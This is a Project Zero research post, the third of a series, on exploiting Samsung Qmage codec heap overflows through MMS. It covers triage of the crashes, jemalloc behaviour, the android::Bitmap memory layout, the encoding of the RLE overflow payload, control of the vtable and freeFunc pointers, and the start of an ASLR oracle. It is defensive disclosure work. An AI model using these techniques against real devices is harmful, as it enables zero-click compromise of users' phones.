Tuesday, July 28, 2020

MMS Exploit Part 3: Constructing the Memory Corruption Primitives

Posted by Mateusz Jurczyk, Project Zero

This post is the third of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In Part 2, I discussed how I managed to fuzz-test the Qmage codec on Google infrastructure at the turn of 2019/2020. It led to the discovery of a huge number of unique crashes, many of which manifested obvious memory corruption problems. After reporting them to Samsung on 28 January 2020, my attention turned to the idea of using some of the vulnerabilities to write an MMS exploit. There was evidence that the Samsung Messages app processed incoming bitmaps without any user interaction, so this seemed like the perfect opportunity to see just how realistic such an attack could be with a wide range of image parsing bugs to choose from. The prospect of developing a zero-click exploit running over the mobile network was new and thrilling to me, and it got me very excited to take the challenge.

The first step in the process was to identify the crashes that were not just high severity on paper, but were also the most convenient for exploitation in a real-life scenario. An ideal bug would be easy to work with (i.e. require a relatively simple structure of the Qmage file), and would provide full control over the memory corruption condition. In case of a heap buffer overflow, this would imply control over the allocation size, overflow size, overflow data, and possibly even the overflow offset (in a non-linear case). Such a bug would lay a strong foundation for any higher-order mechanisms that would have to be implemented in the exploit.

This blog post describes the additional crash triage I performed to find the most suitable bug for exploitation, followed by an analysis of how it was used to turn plain memory corruption into more useful primitives: control over the instruction pointer (PC), and the ability to "probe" the existence of memory ranges. In practice, I was simultaneously experimenting with the MMS protocol to get an initial feel of its design, capabilities and limitations. However, for the sake of clarity, I will limit the scope of this write-up to the low level exploitation details, and proceed to link the memory corruption with the MMS delivery channel in future posts. Let's get started!

Heap fundamentals in Android

The first observation to make is that a great majority of the identified crashes were heap-oriented. There were some instances of stack buffer overflows, but the stack cookie mitigation rendered them non-exploitable. There were also other cases such as reads from uninitialized stack-based pointers, but they didn't seem particularly useful, so in the end, I decided to focus on the 174 "write" crashes, all of which referenced out-of-bounds heap addresses. In principle, such bugs tend to provide the most flexibility in exploitation, as they can be used to corrupt a variety of objects in memory. So, if we are going to work with the Android heap, we should get familiar with the underlying allocator and its security properties.

The allocator currently used in all modern versions of Android is jemalloc (side note: this is going to change with the introduction of Scudo in Android 11). There were two main resources that I found especially useful when learning and experimenting with jemalloc:

  • "The Shadow over Android: Heap exploitation assistance for Android’s libc allocator" at INFILTRATE 2017 (slides) and the shadow exploitation framework itself (GitHub).
  • "A Tale of Two Mallocs: On Android libc Allocators" at INFILTRATE 2018 (video), and the accompanying blog post series (specifically part 2).

I won't go into much detail regarding the internals of the allocator (you can find them in the above sources), but I would like to highlight the following properties that are most relevant to this research:

  • Determinism: jemalloc behaves deterministically, at least to the extent observable by the attacker. For example, with a clean state of the heap, two subsequent allocations of the same size are positioned next to each other.
  • Lack of inline metadata: metadata is stored separately from the allocation itself, so an overflow of one chunk (or "region", as it's called in jemalloc) immediately overwrites the data of the adjacent one, with no metadata in between.
  • Division into size classes: allocations are grouped by size, so any two allocations can only be adjacent to each other if they fall into the same size "bin".
  • Thread caches: a mechanism called "tcaches" improves locality by quickly reusing recently freed regions. This guarantees the predictability of some allocation patterns – for example, a malloc → free → malloc sequence of the same length will return the same address twice.

These characteristics can be favorable or disadvantageous depending on the specific bug and context around it. Overall, in this case, I think these properties added up to a "net positive" from the attacker's perspective, which is not great for user security. For this reason, I am really looking forward to seeing the hardened Scudo allocator enabled by default in Android 11.

Now that we have some background on the behavior we can expect from jemalloc, it's time to analyze the write-violation crashes in search of the most promising ones.

Finding the right bug

With all that we know about jemalloc, we can make a working assumption that if there are two malloc calls, and they can be made to be of a similar size, the second one can be corrupted by the first one with a forward overflow, because it is (usually) placed at a higher address. So in order to assess the usability of a crash, we need to determine:

  • What region is overwritten by the bug?
  • What are the other allocations that are requested between the overwritten allocation and the overflow, and are used after the overflow?

The SkCodecFuzzer test harness has an -l flag that enables the logging of all mallocs and frees to stderr at runtime. It can be used to match the address of the invalid memory access with the corresponding allocation, and see what other allocations are made in between. For example, if we take the signal_sigsegv_40064924d0_4336_c77562cdc52d1baed45ff05bc9ae2023.qmg sample and run it through the loader with the -l flag, we should see the following output (malloc stack traces were edited out for brevity):

[...]
[+] Detected image characteristics:
[+] Dimensions:      148 x 192
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[DEBUG] malloc(    113664) = {0x408c0ff400 .. 0x408c11b000}
[DEBUG] malloc(       104) = {0x408c11cf98 .. 0x408c11d000}
[DEBUG] malloc(     28416) = {0x408c11e100 .. 0x408c125000}
[DEBUG] malloc(        22) = {0x408c126fea .. 0x408c127000}
[DEBUG] malloc(      4120) = {0x408c128fe8 .. 0x408c12a000}
ASAN:SIGSEGV
=================================================================
==212100==ERROR: AddressSanitizer: SEGV on unknown address 0x408c125000 (pc 0x400396c4d0 sp 0x4000d04c90 bp 0x4000d04c90 T0)
    #0 0x002b54d0 in libhwui.so (QuramQmageGrayIndexRleDecode+0xdc)
    #1 0x0029d584 in libhwui.so (__QM_WCodec_decode+0xa3c)
    #2 0x0029c9b4 in libhwui.so (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)
    #3 0x0029ae7c in libhwui.so (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)
[...]

Here, the invalid 0x408c125000 address is the same as the end of the third allocation requested after printing out the image characteristics. Its size of 28416 bytes coincides with 148 (width) × 192 (height), so we can presume that it is a pixel storage buffer and therefore has controlled length. There are two more allocations (highlighted in red) made after the overflown buffer and kept alive until the crash, so each of them could be the target of the memory corruption. In the call stack, we can also see that the problem occurs during RLE decoding, which is a well-known algorithm and thus would probably meet our criteria of being easy to work with. This is how a specific crash can be evaluated for exploitability.

Since I wished to explore the whole range of options and manually performing the same analysis on the other 173 unique "write" crashes seemed tedious, I wrote a quick bash script to generate and process the crash logs to match the invalid accessed addresses with corresponding heap regions. After sorting and deduplicating, they added up to a total of 23 unique overwritten allocation sites. I was not particularly interested in QMv1 crashes (the old format wasn't correctly handled by the Messages application), so I filtered them out from the results, leaving me with 17 allocations subject to overflow. That was a much more manageable number of cases to go through by hand.

After a brief analysis, I concluded that many of them were not optimal for my exploit, because they were temporary buffers, allocated and immediately overflown without any mallocs taking place in between. Taking advantage of such a bug would require an earlier allocation to be mapped above the buffer – a heap state that is possible, but harder to reliably achieve with the limited heap manipulation capabilities of the image codec. The remaining allocation sites that had some potential could be divided into four major groups:

Option 1: The pixel storage buffer associated with the Bitmap object, which is the #1 malloc made by the harness after parsing the headers
Example crash ID
e9e773f3e0a6d155636a52a5418d9160
Size
Controlled through the bitmap dimensions
Allocated in
SkBitmap::tryAllocPixels
Overflown by
  • QuramQumageDecoder8bit
  • QuramQumageDecoder32bit24bit
  • QuramQmageGrayIndexRleDecode
  • qme_inflate_fast (via PVcodecDecoder_zip)
Potential corruption targets
The android::Bitmap object allocated directly after, and any further allocation made by the specific codec (depending on which one is used to trigger the overflow)

Option 2: A temporary output storage buffer, which is the #3 malloc made by the harness after parsing the headers (preceded only by the bitmap object allocation), and the first allocation in the getAndroidPixels call
Example crash ID
b0749f475f0b7af444625c3d1c3a5be8
Size
Controlled through the bitmap dimensions
Allocated in
QuramQmageDecodeFrame_Rev14474_20150224
Overflown by
  • QuramQumageDecoder8bit
  • QuramQmageGrayIndexRleDecode
Potential corruption targets
  • The decoding context structure of size 1688 allocated at the beginning of QuramQumageDecoder8bit, as well as any of the numerous other allocations in that function
  • The RLE decoding context structure of size 4120 allocated in QuramQmageGrayIndexRleDecode

Option 3: A temporary RLE decoding buffer
Example crash ID
03f2d8074d5797537e8c615b2fa53cef
Size
Controlled 32-bit integer from the input stream
Allocated in
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Overflown by
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Potential corruption targets
The RLE decoding context structure of size 4120

Option 4: A temporary zlib decoding buffer
Example crash ID
cbd3dbc9e71b2fec9606eaa3eafce056
Size
Controlled through the bitmap dimensions
Allocated in
QuramQumageDecoder32bit24bit
Overflown by
qme_inflate (as called by QuramQumageDecoder32bit24bitDecodePrediction2dZipPVcodecDecoder_zipqme_uncompress)
Potential corruption targets
The zlib decoding context structure of size 12928

After some consideration, I decided that option 1 (bitmap pixel buffer) was the most promising one, because:

  • It was the earliest overflown malloc, making it possible to corrupt the widest range of subsequently allocated objects, including the Bitmap object.
  • The size was controlled, and in the case of RLE and zlib decompression, the overflow length and data were controlled too. On top of it, I was familiar with both algorithms and thus didn't anticipate any problems constructing the exploit files.

To be specific, I started my experimentation with the e418c0496cb1babf0eba13026f4d1504 crash and the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample. It generated the following report (malloc stack traces again edited out):

[...]
[+] Detected image characteristics:
[+] Dimensions:      40 x 7
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
malloc(      1120) = {0x408c13bba0 .. 0x408c13c000}
malloc(       104) = {0x408c13df98 .. 0x408c13e000}
malloc(        24) = {0x408c13ffe8 .. 0x408c140000}
malloc(      4120) = {0x408c141fe8 .. 0x408c143000}
ASAN:SIGSEGV
=================================================================
==3746114==ERROR: AddressSanitizer: SEGV on unknown address 0x408c13c000 (pc 0x40071feb74 sp 0x4000d0b1f0 bp 0x4000d0b1f0 T0)
    #0 0x00249b74 in libhwui.so (QuramQmageGrayIndexRleDecode+0xd8)
    #1 0x002309d8 in libhwui.so (PVcodecDecoderIndex+0x110)
    #2 0x00230854 in libhwui.so (__QM_WCodec_decode+0xe4)
    #3 0x00230544 in libhwui.so (Qmage_WDecodeFrame_Low+0x198)
    #4 0x0022c604 in libhwui.so (QuramQmageDecodeFrame+0x78)
[...]

Here, we are overflowing the 1120-byte buffer (width × height × bpp; 40 × 7 × 4 = 1120), and can corrupt the three subsequent ones marked in red. The first (104 bytes) is the Bitmap structure, the second (24 bytes) is the RLE-compressed input stream, and the third (4120 bytes) is the RLE decoder context structure. The Bitmap object sounds the most useful, and since I have already mentioned it so many times, let's finally look into it to see how it works! We'll be operating on the assumption that if we adjust the Qmage dimensions such that the pixel buffer consumes 104 bytes (e.g. 13x2), then the two allocations will likely be adjacent on Android, giving us full (linear) control over the second region.

Enter the Android Bitmap object

First of all, it is important to note that the Bitmap object created by our test harness is not exactly the same as the one used in Android, because of a difference in the allocator objects used (SkBitmap::HeapAllocator vs GraphicsJNI's HeapAllocator). This is irrelevant for fuzzing, but makes a big difference in exploit development. In order to learn about the actual object being allocated on Android, we can use a simple Frida script that hooks the heap-related functions and logs all of their invocations with stack trace. If we attach it to the com.samsung.android.messaging process and send an MMS with the proof-of-concept image, we should see output similar to the following (I demangled some symbols and edited out argument definitions for brevity):

[10036] calloc(1120, 1) => 0x7bc1e95900
    0x7cbba83684 libhwui.so!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54 libhwui.so!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178 libandroid_runtime.so!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80 libhwui.so!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8 libandroid_runtime.so!0x187ae8
    0x7cbd81fc8c libandroid_runtime.so!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[10036] malloc(160) => 0x7b8cd569e0
    0x7cbddd35c4 libc++.so!operator new+0x24
    0x7cbe67e608
[10036] malloc(24) => 0x7b8ca92580
    0x7cbb87baf4 libhwui.so!QuramQmageGrayIndexRleDecode+0x58
    0x7cbe67e608
[10036] calloc(1, 4120) => 0x7bc202c000
    0x7cbb89fb14 libhwui.so!init_process_run_dec+0x20
    0x7cbb87bb34 libhwui.so!QuramQmageGrayIndexRleDecode+0x98
    0x7cbb8629d4 libhwui.so!PVcodecDecoderIndex+0x10c
    0x7cbb862850 libhwui.so!__QM_WCodec_decode+0xe0
    0x7cbb862540 libhwui.so!Qmage_WDecodeFrame_Low+0x194
    0x7cbb85e600 libhwui.so!QuramQmageDecodeFrame+0x74
[...]

Here, we can again see the familiar highlighted allocations before the overflow occurs. The only difference is the size of the Bitmap object: it's 104 in our loader but 160 on Android. Unfortunately Frida didn't correctly unwind the stack for the malloc call, but based on the pixel buffer stack trace, we can figure out that it takes place in android::Bitmap::allocateHeapBitmap:

116:  sk_sp<Bitmap> Bitmap::allocateHeapBitmap(size_t size, const SkImageInfo& info, size_t rowBytes) {
117:      void* addr = calloc(size, 1);
118:      if (!addr) {
119:          return nullptr;
120:      }
121:      return sk_sp<Bitmap>(new Bitmap(addr, size, info, rowBytes));
122:  }

As expected, there is a calloc call for allocating pixel storage, followed by the creation of the Bitmap object itself. This is how the function prologue looks in Hex-Rays:
Decompiled prologue of the allocateHeapBitmap method
If we quickly change the Qmage file dimensions to 10x4, such that the pixel buffer becomes 160 (or any length between 129 and 160, which is the relevant jemalloc bin size), then we can use Frida to verify that the two Bitmap-related allocations are indeed adjacent:

[15699] calloc(160, 1) => 0x7b88feb8c0
    0x7cbba83684 libhwui.so!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54 libhwui.so!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178 libandroid_runtime.so!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80 libhwui.so!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8 libandroid_runtime.so!0x187ae8
    0x7cbd81fc8c libandroid_runtime.so!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[15699] malloc(160) => 0x7b88feb960
    0x7cbddd35c4 libc++.so!operator new+0x24
    0x7cbe582608

The difference between 0x7b88feb8c0 and 0x7b88feb960 is 160 (0xA0), exactly the size of the first chunk, which means that we should be able to precisely overwrite the succeeding android::Bitmap object. This behavior is not 100% reliable and is hugely dependent on the preexisting heap state of the attacked app, but I found that it was reliable enough to enable successful, practical attacks. I will expand more on this in the next blog post in the series.

It's finally time to look at the android::Bitmap layout in memory. Currently, the class is defined in frameworks/base/libs/hwui/hwui/Bitmap.h in the Android source tree. Some of its private fields are visible there, but their volume surely doesn't sum up to 160 bytes. This is because the code makes heavy use of C++ inheritance, so android::Bitmap inherits from SkPixelRefSkRefCntSkRefCntBase. After untangling the above chain of classes and figuring out the alignment requirements for each field, I arrived at the following layout:

struct android::Bitmap {

  /* +0x00 */ void *vtable;

  //
  // class SK_API SkRefCntBase
  //

  /* +0x08 */ mutable std::atomic<int32_t> fRefCnt;

  //
  // class SK_API SkPixelRef : public SkRefCnt
  //

  /* +0x0C */ int     fWidth;
  /* +0x10 */ int     fHeight;
  /* +0x18 */ void*   fPixels;
  /* +0x20 */ size_t  fRowBytes;

  /* +0x28 */ mutable std::atomic<uint32_t> fTaggedGenID;

  struct /* SkIDChangeListener::List */ {
  /* +0x30 */ std::atomic<int> fCount;
  /* +0x34 */ SkOnce           fOSSemaphoreOnce;
  /* +0x38 */ OSSemaphore*     fOSSemaphore;
  } fGenIDChangeListeners;

  struct /* SkTDArray<SkIDChangeListener*> */ {
  /* +0x40 */ SkIDChangeListener* fArray;
  /* +0x48 */ int                 fReserve;
  /* +0x4C */ int                 fCount;
  } fListeners;

  /* +0x50 */ std::atomic<bool> fAddedToCache;

  /* +0x51 */ enum Mutability {
  /* +0x51 */   kMutable,
  /* +0x51 */   kTemporarilyImmutable,
  /* +0x51 */   kImmutable,
  /* +0x51 */ } fMutability : 8;

  //
  // class ANDROID_API Bitmap : public SkPixelRef
  //

  struct /* SkImageInfo */ {
  /* +0x58 */ sk_sp<SkColorSpace> fColorSpace;
  /* +0x60 */ int fWidth;
  /* +0x64 */ int fHeight;
  /* +0x68 */ SkColorType fColorType;
  /* +0x6C */ SkAlphaType fAlphaType;
  } mInfo;

  /* +0x70 */ const PixelStorageType mPixelStorageType;
  /* +0x74 */ BitmapPalette mPalette;
  /* +0x78 */ uint32_t mPaletteGenerationId;
  /* +0x7C */ bool mHasHardwareMipMap;

  union {
    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ void* context;
  /* +0x90 */ FreeFunc freeFunc;
    } external;

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ int fd;
  /* +0x90 */ size_t size;
    } ashmem;

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ size_t size;
    } heap;

    struct {
  /* +0x80 */ GraphicBuffer* buffer;
    } hardware;
  } mPixelStorage;

  /* +0x98 */ sk_sp<SkImage> mImage;
};

We can immediately spot a number of interesting fields such as the vtable, pointer to backing pixel storage, bitmap dimensions, a raw function pointer (freeFunc), and pointers to other C++ objects such as SkColorSpace, GraphicBuffer and SkImage. The class clearly has the potential to supply many useful exploitation primitives. Let's go ahead and test some initial ideas to see how the code behaves in contact with a corrupted Bitmap object.

Building code execution primitives

In order to start experimenting with the heap corruption, we have to construct a test case that will be easy to adjust for different tests. For building editable binary files for testing file format parsers, I usually use nasm. It allows me to write code-like .asm sources file that specify the values of respective header fields with the db/dw/dd/… pseudo-instructions, may include comments, and can be quickly "compiled" to raw binary form. This is what I also used here, to craft the proof-of-concept Qmage file from scratch, based on the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample and reverse engineering the codec in libhwui.so. This is where the debug symbols from old builds of libQmageDecoder.so I dug up earlier in the recon phase (as discussed in Part 1) proved very useful.

The nasm source code of the Qmage file I used for experimentation can be found here. It consists of the following logical parts:

  • File header specifying a QG1.2 format version (equivalent to 2.0, as explained in Part 2) and 4x10 bitmap dimensions.
  • A zlib-compressed color table with all 0x41's.
  • A required \xFF\x00 marker, followed by the 0x06 RLE compression type.
  • A RLE-compressed stream of 161-320 bytes: the first 160 to fill out the pixel buffer, followed by 1-160 bytes depending on what portion of the android::Bitmap object we intend to overwrite.
  • A trailing \xFF\x00 marker.

Notably, the RLE compression used in Qmage is not the simple one we know from BMP files. Based on the structure of the code and some RLE-related symbols (init_process_run, process_run, init_process_run_dec, process_run_dec), we can deduce that it is probably a MELCODE scheme. For our purposes, though, it's not much more complicated. If we intend to take a data blob and wrap it with the RLE structure while actually not reducing its size (similar to how zlib compression level 0 works), it's a matter of adding a simple prefix and suffix. For example, a compressed 8-byte string "ABCDEFGH" takes the following form:

00000000: 0e 00 00 00 08 00 00 00 41 42 43 44 45 46 47 48  ........ABCDEFGH
00000010: aa aa                                            ..

The little-endian 0x0000000E value indicates the length of the overall compressed stream, 0x00000008 specifies the number of runs – in this case, length of the decompressed data, then there is the raw data and finally N÷4 bytes 0xAA, each of which signifies four runs, one-byte each. With that out of the way, we can proceed to testing potential code execution primitives.

The first idea is to overwrite the vtable pointer and see if/where the code crashes. Since it's the first field in memory, we only have to write 8 bytes past the end of the pixel buffer. If we set them to AAAAAAAA and send such a file via MMS, we should see the following crash:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151 in tid 24642 (ReferenceQueueD), pid 24624 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 24624, tid: 24642, name: ReferenceQueueD  >>> com.samsung.android.messaging <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151
    x0  0000007c2ac85e40  x1  0000007c25ae9724
    x2  0000007cbd81f1b8  x3  0000007c2ad2d9c0
    x4  000000006f2693ac  x5  0000007c25ae96e4
    x6  0000000000000001  x7  0000000000000000
    x8  4141414141414141  x9  0000000000000000
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000000000360168  x13 0000000000004000
    x14 0000000000000004  x15 0000000000000000
    x16 0000007c25ae9710  x17 0000000000000bc3
    x18 0000007bd31ee000  x19 0000007c2ad2d9c0
    x20 0000007c3034ff80  x21 0000000013126208
    x22 0000000013126208  x23 00000000131261a0
    x24 000000006f26bb50  x25 00000000131261e0
    x26 0000007cc0350cb0  x27 0000007c3a3f5000
    x28 0000007c25aea020  x29 0000007c25ae9700
    sp  0000007c25ae96f0  lr  00000000705bdc44
    pc  0000007cbd81f210

backtrace:
      #00 pc 0000000000186210  /system/lib64/libandroid_runtime.so (Bitmap_destruct(android::BitmapWrapper*)+88) (BuildId: 21b5827e07da22480245498fa91e171d)
[...]

There is an access to the controlled 0x4141414141414141 address in Bitmap_destruct. The code accessing the pointer is as follows:

.text:0000000000186210                 LDR             X8, [X8,#0x10]
.text:0000000000186214                 BLR             X8

As expected, we get an arbitrary vtable call. It is a great first primitive to confirm, and it is direct evidence that everything seems to be working according to plan. Of course at this point, we don't know where any code is located (to redirect execution there), or even where our controlled data is situated (to set up our fake vtable). However, let's focus on one thing at a time. What's important is that the vtable call is controlled by the value of the consecutive fRefCnt field, so we may choose to trigger it or not by setting the reference counter to a small or large integer.

The second eye-catching field that can be likely abused to hijack code execution is the freeFunc function pointer in the mPixelStorage union:

    struct {
  /* +0x80 */ void* address;
  /* +0x88 */ void* context;
  /* +0x90 */ FreeFunc freeFunc;
    } external;

We can check where the pointer is used by running a quick cs.android.com search. As it turns out, it is called in the Bitmap::~Bitmap destructor:

236:       case PixelStorageType::External:
237:            mPixelStorage.external.freeFunc(mPixelStorage.external.address,
238:                                            mPixelStorage.external.context);
239:            break;

If we look at the broader context of the code, the destructor may provide the attacker with an assortment of primitives, depending on the value of the mPixelStorageType enum: arbitrary munmap+close, arbitrary free, and another arbitrary vtable call (through the mPixelStorage.hardware.buffer pointer). However, I find the freeFunc pointer the most useful, especially in a potential one-shot scenario where we try to take over control of the app with a single, specially crafted MMS message. Conveniently, the function also takes two arguments, which we may control – or in fact, must control, because reaching the freeFunc field with a linear overflow is only possible after overwriting both address and context.

The only problem with this technique is that the Bitmap destructor itself is called through the vtable at offset 0, the one that we have to corrupt in order to get to the deeper fields in the class. Therefore, we can only use it in our exploit if we leave the vtable pointer intact after the overflow. This, in turn, requires the knowledge of the libhwui.so base address. At this point in the story, we don't know how we could leak such information yet, but exploitation gadgets like this are worth writing down even if we don't have all the pieces of the puzzle to make use of them yet.

To make sure that we're reading the code right, we should confirm the behavior in practice. We can construct a Qmage sample that overwrites the full 160 bytes of the Bitmap object with a marker 0x41 byte, and then fine-tune a few specific fields for the experiment:

  • vtable set to its original value, in my case 0x7cbbdfc4e0 (0x7cbb632000 base address + 0x7ca4e0 offset)
  • fRefCnt set to 1
  • mPixelStorageType set to 0 (External)
  • mPixelStorage.external.address set to 0xaaaa...aaa.
  • mPixelStorage.external.context set to 0xbbbb...bbb.
  • mPixelStorage.external.freeFunc set to 0xcccc...ccc.

If we send it via MMS, we should see the following crash in logcat:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 13700 (pool-5-thread-1), pid 12954 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12954, tid: 13700, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc
    x0  aaaaaaaaaaaaaaaa  x1  bbbbbbbbbbbbbbbb
    x2  0000000000000001  x3  0000000000000000
    x4  0000007c2be315d0  x5  0000007c3910cc64
    x6  0000000000000000  x7  00000000186f2b72
    x8  cccccccccccccccc  x9  0000007cbbdfc4f0
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000007c3175b20c  x13 000000005f0cc80f
    x14 003419f64036d144  x15 000051761dd7a34a
    x16 0000007cbd8f3230  x17 0000007cbba98620
    x18 0000007bbc84e000  x19 0000007bc8ff8dc0
    x20 0000000000000000  x21 0000007bc9153540
    x22 000000000000000c  x23 0000000000000000
    x24 0000000000000000  x25 0000000000000002
    x26 0000007c2be32d50  x27 0000000000000059
    x28 0000007cc03fa7c0  x29 0000007c2be319c0
    sp  0000007c2be319b0  lr  0000007cbba69f00
    pc  cccccccccccccccc

backtrace:
      #00 pc cccccccccccccccc  <unknown>
      #01 pc 0000000000437efc  /system/lib64/libhwui.so (android::Bitmap::~Bitmap()+252) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]

As the crash report shows, we control the instruction pointer (PC) and two 64-bit arguments (registers X0 and X1).

In summary, we have two powerful primitives for hijacking the control flow at our disposal – an indirect one through a corrupted vtable pointer, and a direct one through the freeFunc function pointer (with knowledge of the libhwui.so location). This brings us much closer to the ultimate goal of executing arbitrary code. The biggest unsolved problem is now ASLR – since the locations of all important memory regions (stack, heap, shared objects) are randomized, we are completely in the dark as to where we could redirect any kind of pointer. It is time to see if the android::Bitmap object has anything to offer in terms of leaking address space information or otherwise defeating ASLR.

Building an ASLR oracle primitive

In most publicly documented exploitation scenarios, ASLR is bypassed in a highly interactive environment, where the communication between the exploit and the attacked software goes both ways. Examples include JavaScript exploits vs. web browser engines, user-mode exploits vs. OS kernels, and remote exploits vs. network daemons. In all these cases, the leaked address of some object in memory is typically received by the exploit in full, and the "ASLR bypass" problem boils down to enticing the target to transmit the address to the client as part of a standard data exchange.

The circumstances are largely different for exploits delivered via MMS. Here, all communications are realized through one or more mobile network operators, and it is (mostly) a one way protocol. As a result, a remote attacker gets very little visibility into what happens on the victim's phone, let alone being able to disclose some complex information such as a 64-bit address in one go. Notably, the same problem was already encountered by Samuel Groß when exploiting an iPhone iMessage CVE-2019-8641 vulnerability in 2019. In his research, Samuel managed to work around it by making use of message delivery receipts. Depending on how they are implemented, they may be abused to construct a rudimentary 1-bit communication channel going back to the attacker, potentially carrying some kind of address-related information. In case of iMessage, it conveyed the output of an ASLR oracle, indicating if a given absolute address was mapped in memory and had some specific properties. I highly recommend reading the relevant "Remote iPhone Exploitation Part 2: Bringing Light into the Darkness – a Remote ASLR Bypass" post on the Project Zero blog.

The mechanics of the MMS protocol will be discussed in detail in the next post, but for the sake of the storyline I will reveal that MMS also supports delivery receipts. What's more, some SMS/MMS apps such as Samsung Messages do allow the disclosure of information on whether or not the process crashed while processing the incoming message. In turn, this opens up the opportunity to leak partial information about the address space, if we can tie the crash/no crash outcome to the process memory layout. That's where the corrupted Bitmap object comes into play again.

The most basic idea for how to achieve that is by overwriting a pointer with an absolute address whose readability (or writability) we intend to test. In theory, if the address is unmapped, the access will crash, and if it is mapped, the read or write will succeed and the app will stay alive. In practice, things are not so simple, because the process may also crash while operating on the data read from the tested address. So for example, the vtable pointer is not a great candidate for an ASLR oracle, because keeping the process alive would not only require it to point to a readable region, but it would also need to contain the address of a function semi-compatible with the original destructor. Such an oracle would realistically hardly ever return true, which makes it of little use to us.

Luckily, the Bitmap object also contains a few other pointers we can try to target. To start off, we can overwrite its whole area with all 0x41's and see how the process crashes, to determine which pointers are accessed, where, and how. The experiment should yield the following result:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 11604 (pool-5-thread-1), pid 10524 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 000000000047a760  /system/lib64/libhwui.so (SkColorSpace::toXYZD50(skcms_Matrix3x3*) const+8)
      #01 pc 000000000018df90  /system/lib64/libandroid_runtime.so (GraphicsJNI::getColorSpace(_JNIEnv*, SkColorSpace*, SkColorType)+280)
      #02 pc 00000000002b5788  /system/framework/arm64/boot-framework.oat (art_jni_trampoline+152)
      #03 pc 00000000005818bc  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.getColorSpace+76)
      #04 pc 000000000057faf0  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.createBitmap+880)
      #05 pc 00000000005804f4  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.createScaledBitmap+372)

The stack trace indicates that the crash occurs while accessing the color space, which is represented by the mInfo.fColorSpace pointer. It might be promising for an oracle, but let's see what happens if it's set to an address of readable memory containing only zeros:

Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 12666 (pool-5-thread-1), pid 12550 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12550, tid: 12666, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<
uid: 10128
signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr --------
Abort message: 'No pending exception expected: java.lang.IllegalArgumentException: Parameter a or g is zero, the transfer function is constant
  at void android.graphics.ColorSpace$Rgb$TransferParameters.<init>(double, double, double, double, double, double, double) (ColorSpace.java:2264)
  at android.graphics.ColorSpace android.graphics.Bitmap.nativeComputeColorSpace(long) (Bitmap.java:-2)
  at android.graphics.ColorSpace android.graphics.Bitmap.getColorSpace() (Bitmap.java:2091)

Unfortunately, the app crashes again, this time due to a failed color space sanity check performed by the TransferParameters method. This means that that pointer is not the perfect gadget for us either, because zeros in memory are exceedingly common, and it would be preferable to distinguish unmapped memory from mapped zero'ed memory in the ASLR oracle output.

The advantage of the last crash report is that it gives us a very clean Java call stack, indicating exactly where the bitmap-related operations occur. It is shown below in full, up until the Messages app method that loads the bitmap delivered in MMS:

android.graphics.ColorSpace$Rgb$TransferParameters.<init>
android.graphics.Bitmap.nativeComputeColorSpace
android.graphics.Bitmap.getColorSpace
android.graphics.Bitmap.createBitmap
android.graphics.Bitmap.createScaledBitmap
com.samsung.android.messaging.common.util.ImageUtil.scaleToHeight
com.samsung.android.messaging.common.util.ImageUtil.scaleToWidth
com.samsung.android.messaging.common.util.ImageUtil.loadBitmapFromStream
com.samsung.android.messaging.common.util.ImageUtil.loadBitmap
com.samsung.android.messaging.common.util.ImageUtil.loadBitmap
com.samsung.android.messaging.ui.model.l.at.a
[...]

We can see that Samsung has a helper ImageUtil class for working with bitmaps, and that unfortunately some symbols in the app are obfuscated (i.e. the ui.model.l.at.a method name). Since the Messages app is not open source, we have to decompile it in order to examine the relevant code. The APK can be found in the /system/priv-app/SamsungMessages_11/SamsungMessages_11.apk file, and my decompiler of choice is jadx.

